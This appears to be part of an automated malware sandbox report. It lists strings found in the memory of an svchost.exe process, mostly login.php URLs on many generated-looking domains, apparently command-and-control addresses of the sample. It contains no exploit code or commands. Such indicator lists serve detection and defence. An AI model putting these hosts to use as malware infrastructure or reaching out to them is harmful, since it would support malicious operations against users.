Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymir.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvynen.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvysaj.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2510214419.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358756275.000000000B407000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360218720.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151201367.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2520844909.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytuj.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090604412.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2561052961.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyver.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020836236.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023012112.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyvix.com/login.php
Source: svchost.exe, 00000002.00000003.1793087663.000000000662E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790880337.000000000662C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywed.com/H
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywed.com/http://gadyveb.com/http://lygyfex.com/http://gadyveb.com/
Source: svchost.exe, 00000002.00000003.2059929995.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083716272.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078402402.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088531280.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086240326.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063935893.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048160160.00000000066BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywux.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfar.com/http://gaqyqis.com/http://puvygyq.com/0
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006806064.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfar.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfar.com/p
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565639625.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfuj.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygax.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygud.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygur.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048160160.00000000066BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymed.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynir.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473737511.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2099763870.0000000006676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysad.com/
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2001269447.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2002557567.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006795851.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysun.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxytur.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033528164.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029714857.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036451216.00000000066BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php4
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybop.com/login.php
Source: svchost.exe, 00000002.00000003.2564959910.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564961073.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydaq.com/http://ganyzuz.com/http://pufydaq.com/H
Source: svchost.exe, 00000002.00000003.2564959910.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564961073.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydaq.com/http://vopydaf.com/http://qekyqoq.com/0
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydul.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygav.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjuq.com/login.php
Source: svchost.exe, 00000002.00000003.2394184434.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460748465.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2441645467.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425878319.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524608844.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397913686.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423753303.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454863582.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446339089.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536917533.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2416226275.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181277.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450513652.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylap.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypeg.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1890971737.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypiq.com/login.php
Source: svchost.exe, 00000002.00000002.2587888808.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypuv.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyweq.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565639625.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxug.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602250771.0000000006674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybev.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybig.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362751556.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycov.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/login.php
